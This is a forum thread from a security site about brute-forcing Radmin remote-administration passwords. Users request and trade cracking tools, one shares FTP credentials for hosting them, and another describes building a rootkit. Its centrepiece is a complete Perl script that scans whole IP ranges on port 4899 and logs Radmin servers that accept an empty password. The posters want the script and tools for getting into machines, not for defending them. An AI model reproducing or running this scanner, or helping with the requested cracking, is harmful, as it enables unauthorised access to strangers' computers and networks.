Government Security
Network Security Resources

Jump to content

Photo

Radmin Brute Force Password Attack

- - - - - windows server bug tools dictionary
  • Please log in to reply
27 replies to this topic

#16 Yevilknight

Yevilknight

    Private

  • Members
  • 9 posts

Posted 21 March 2005 - 11:12 AM

i searching the

Nova's Radmin Dictionary Password Hacker

but i dont found it with google and the download url are down!
can anybuddy give me this progy??

#17 ViBi

ViBi

    Private

  • Members
  • 8 posts

Posted 22 March 2005 - 02:35 AM

Oh would be really nice if someone could upload that file again.

I supply the (free)space ;)

ftp://gmgkrdnp:govsec@home.arcor.de
http://home.arcor.de/gmgkrdnp/


//Edit: I tried ViXSCAN but a non-gui-bruter like SQLck would be quite handier

#18 twistedps

twistedps

    Staff Sergeant

  • Members
  • 271 posts

Posted 23 March 2005 - 10:22 PM

ive always been skeptical about brute forcing radmin, and without using this script method, i dont know how its done. I researched radmin stuff a while ago, and its all key based encryption when its sent out, so its a different hash being sent out. unless you knew the key to that hash each time, and then encoded it, i dont know of a way to do it via pure programming without the hash algorithm.
VIXVVXIV, can you shed some light onto the subject?

#19 Web-Hack

Web-Hack

    Private

  • Members
  • 9 posts

Posted 24 March 2005 - 01:38 PM

#!/usr/bin/perl

use IO::Socket;





##################################################

#           Radmin with empty password scanner

#

#                   usage: ./scan.pl 213.59.*.*

#  thanx to Forb

#             Coded by  Satir (satir@cyberlords.net) from CyberLords [cyberlords.net]

################################################################################

#####



$|++; 

use IO::Socket;  ## ????? ??????



$pids=10;  ## Count of threads

$port = 4899; ## Default port

$tout = 5;  ## Default timeout

$log = 'scan.log'; ## Default logfile





$once=0;

$fatal=0;



if (@ARGV[0]=~/((.*)\.(.*)\.(.*)\.(.*))/) {

     $netmask = $1;

     $n1 = $2;

     $n2 = $3;

     $n3 = $4;

     $n4 = $5; 

}



quit("Incorrect port") if ($port=~/\D/);

quit("No hostmask given") unless $netmask;

check();



while(1) {  

  @ips=@ipz[$once..$once+$pids]; 

  for ($i=0;$i<=$pids;$i++) {  

    unless($ips[$i]) { 

      killpidz();  

      exit print "Scan is complete\n";

    }

    

    

if ($pid=fork()) {  

push(@forked,$pid);

} else {

      $res=check_radmin($ips[$i],$port);  

      logg($ips[$i],$res) if ($res ne 0);

      exit;

    }

  }

  $once+=$pids;

  killpidz();

}



sub check {  

  for ($i=0;$i<=254;$i++) {  

    $ipi = $i;  

    if ($n2 ne '*')  { $i = 254,$ipi = $n2 }  

    for ($j=0;$j<=254;$j++) {  

      $ipj = $j;  

      if ($n3 ne '*')  { $j = 254,$ipj = $n3 }  

        for ($k=1;$k<=254;$k++) {

          $ipk = $k;

          if ($n4 ne '*') { $k = 254,$ipi = $n2 }  

          my($ipaddr) = "$n1\.$ipi\.$ipj\.$ipk"; 

          chomp($ipaddr);

          push(@ipz,$ipaddr); 

       }

    }

  }

}



sub quit {

  my($reason)=@_;

  print "$reason\n" if $reason;

  exit; 

}



sub logg { 

  my($ip,$ans)=@_; 

  open(LOGG,">>$log");

  $str="NULL PASS!!!" if $ans eq 1;

  $str="need pass." if $ans eq 2;

  

  print LOGG "$ip:$port : $str\n";

  close(LOGG);

}



sub killpidz { 

  foreach (@forked) {

    chomp;

    waitpid($_,0);

    kill("TERM" => $_)

  }

  undef @forked;

}





sub check_radmin{

($host,$port)=@_;



  $sock=IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Photo => "tcp");

  

  if($sock)

  {

    $sock->send("\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08");

    $sock->recv($data,1024);  

    close($sock);

    

    @marks=split(//,$data);  

    foreach(@marks){

      $string.=unpack('H8', $_);

    }  

    if($string=~/a080/g){

      return 1;

    }

    else{

      return 2;

    } 

    

   }else { return 0;}

}


#20 SantaSemperChi

SantaSemperChi

    Private First Class

  • Members
  • 30 posts

Posted 27 March 2005 - 12:10 AM

@ VIX:
in your website the radmin brute package is corrupted, i tried to unzip it but it shows me an error like "archive is demaged or it is an unknown format" :ph34r:

#21 alzeimeur

alzeimeur

    Private

  • Members
  • 15 posts

Posted 27 March 2005 - 02:12 PM

The link to the program is down :(

Can Nova or anyone else, repost it ? :)

thanx in advance


al"

#22 Lanstat

Lanstat

    Private

  • Members
  • 8 posts

Posted 03 April 2005 - 10:56 PM

It worked great, but i have few suggestions
It should automatically close the previous windows
And isn't there an option to use proxy or something similar?

I tried on my local pc but all stuff was logged

#23 hcoca

hcoca

    Private First Class

  • Members
  • 30 posts

Posted 28 May 2005 - 07:56 AM

The link to the program is down  :(

Can Nova or anyone else, repost it ? :)

thanx in advance


al"

<{POST_SNAPBACK}>


why dont u try at Nova's Site...

#24 q7x

q7x

    Private

  • Members
  • 10 posts

Posted 29 May 2005 - 09:17 AM

tanx
but you can use hash tables
hash tables is very fast and esay method
Nima Salehi www.Ashiyane.ir

#25 Guest_jhdscript_*

Guest_jhdscript_*
  • Guests

Posted 30 May 2005 - 03:20 AM

can you explain the method using hash ?

#26 PsyXhO

PsyXhO

    Private

  • Members
  • 16 posts

Posted 20 June 2005 - 12:14 PM

Pretty nice script, but:

Access forbidden!
You don't have permission to access the requested object. It is either read-protected or not readable by the server.


Seconding alzeimeur's request, do you think you could provide us with another link?

Thanks :)

#27 Tyler

Tyler

    Master Sergeant

  • Members
  • 838 posts

Posted 21 June 2005 - 12:42 PM

I also get access forbidden probably becasue of the user of bandwidth. I would prefer a compiled versoin if possible so that i can test it out. I know it's still beta but if someone can host it i am interested in trying it out. Thanks for all the hard work you have dont to put into it. I myself have been trying to program a rootkit so that all you have to do is type site exec radmin.exe <port> but it only seems to work with perameters but if any of you know how to do with incorperating the perameters in a string so you have like radmin.exe and if you leave it blank it has a default port of somethin like 29932 or somethign random and then if you put the port after like radmin.exe <port> it would be saved as that port. I have spent a lot of time trying to do this and haven't had to much success so if you could let me know tha twoudl be awesome :)

#28 alexj

alexj

    Private

  • Members
  • 1 posts

Posted 19 July 2011 - 06:24 AM

Can somebody upload this again cause i really need it. I need to find out the Password in a LAN.





Also tagged with one or more of these keywords: windows, server, bug, tools, dictionary